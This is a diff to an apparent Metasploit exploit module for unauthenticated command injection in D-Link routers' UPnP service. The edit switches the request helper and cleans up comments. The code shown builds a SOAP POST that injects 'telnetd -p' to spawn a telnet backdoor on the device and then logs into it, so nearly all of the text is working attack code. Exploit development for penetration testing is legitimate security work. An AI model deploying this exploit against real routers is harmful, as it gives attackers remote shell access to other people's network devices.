HTTP GET

Author: m-1-k-3

modules/exploits/linux/http/dlink_upnp_exec_noauth.rb

@@ -124,15 +124,15 @@ def request(cmd, type, new_external_port, new_internal_port, new_portmapping_des
 		data_cmd << "</SOAP-ENV:Envelope>"
 
 		begin
-			res = send_request_raw({
-				'uri'    => uri << data_uri,
-				#'vars_get' => {
-				#	'service' => 'WANIPConn1'
-				#},
+			res = send_request_cgi({
+				'uri'    => uri,
+				'vars_get' => {
+					'service' => 'WANIPConn1'
+				},
+				'ctype' => "text/xml",
 				'method' => 'POST',
 				'headers' => {
 					'SOAPAction' => soapaction,
-					'Content-Type' => "text/xml"
 					},
 				'data' => data_cmd
 			})
@@ -179,7 +179,7 @@ def exploit
 			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
 			#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
-			cmd = "telnetd -p #{telnetport}"	# -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			cmd = "telnetd -p #{telnetport}"
 			type = "add"
 			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
@@ -200,7 +200,7 @@ def exploit
 					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
 
-				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
+				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
 				auth_info = {
 					:host   => rhost,
 					:port   => telnetport,